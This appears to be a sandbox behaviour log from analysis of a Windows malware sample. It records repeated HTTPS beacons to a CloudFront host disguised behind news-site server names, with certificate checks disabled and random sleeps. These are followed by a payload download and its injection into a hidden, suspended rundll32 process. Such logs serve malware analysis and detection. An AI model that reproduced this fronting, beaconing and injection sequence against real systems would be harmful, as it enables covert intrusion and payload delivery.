Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:34:33 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:34:33 (Local Time) True 1
Fn
System Sleep duration = 14496 milliseconds (14.496 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:34:43 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:34:43 (Local Time) True 1
Fn
System Sleep duration = 12395 milliseconds (12.395 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:34:54 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:34:54 (Local Time) True 1
Fn
System Sleep duration = 13399 milliseconds (13.399 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:35:05 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:35:05 (Local Time) True 1
Fn
System Sleep duration = 13594 milliseconds (13.594 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:35:15 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:35:15 (Local Time) True 1
Fn
System Sleep duration = 14922 milliseconds (14.922 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:35:26 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:35:26 (Local Time) True 1
Fn
System Sleep duration = 12890 milliseconds (12.890 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:35:37 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:35:37 (Local Time) True 1
Fn
System Sleep duration = 13768 milliseconds (13.768 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:35:48 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:35:48 (Local Time) True 1
Fn
System Sleep duration = 12597 milliseconds (12.597 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:35:58 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:35:58 (Local Time) True 1
Fn
System Sleep duration = 14512 milliseconds (14.512 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:36:09 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:36:09 (Local Time) True 1
Fn
System Sleep duration = 12289 milliseconds (12.289 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:36:20 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:36:20 (Local Time) True 1
Fn
System Sleep duration = 12913 milliseconds (12.913 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:36:30 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:36:30 (Local Time) True 1
Fn
System Sleep duration = 14074 milliseconds (14.074 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = maptile.usnews.com, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = maptile.usnews.com/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:36:41 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:36:41 (Local Time) True 1
Fn
System Sleep duration = 13702 milliseconds (13.702 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = asset.wsj.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = asset.wsj.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:36:52 (Local Time) True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Local Time, time = 2018-02-16 05:36:52 (Local Time) True 1
Fn
System Sleep duration = 14513 milliseconds (14.513 seconds) True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = www.reutersmedia.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /safebrowsing/rd/ij34Feg034rf4-p34, accept_types = 2943088, flags = INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Host: dl6zxn23r8r14.cloudfront.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Cookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm , url = www.reutersmedia.net/safebrowsing/rd/ij34Feg034rf4-p34 True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 4096 True 39
Fn
Data
Inet Read Response size = 4096, size_out = 3168 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x76bd96e0 True 1
Fn
Process Create process_name = C:\Windows\syswow64\rundll32.exe, os_pid = 0xac4, creation_flags = CREATE_SUSPENDED, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
Process Open desired_access = PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION True 1
Fn
System Sleep duration = 100 milliseconds (0.100 seconds) True 1
Fn
Memory Allocate process_name = c:\windows\syswow64\rundll32.exe, address = 0x1c0000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_READWRITE, size = 163840 True 1
Fn
Memory Write process_name = c:\windows\syswow64\rundll32.exe, address = 0x1c0000, size = 162816 True 1
Fn
Data
Memory Protect process_name = c:\windows\syswow64\rundll32.exe, address = 0x1c0000, protection = PAGE_EXECUTE_READ, size = 163840 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x76bd96e0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76bc0000 True 1
Fn
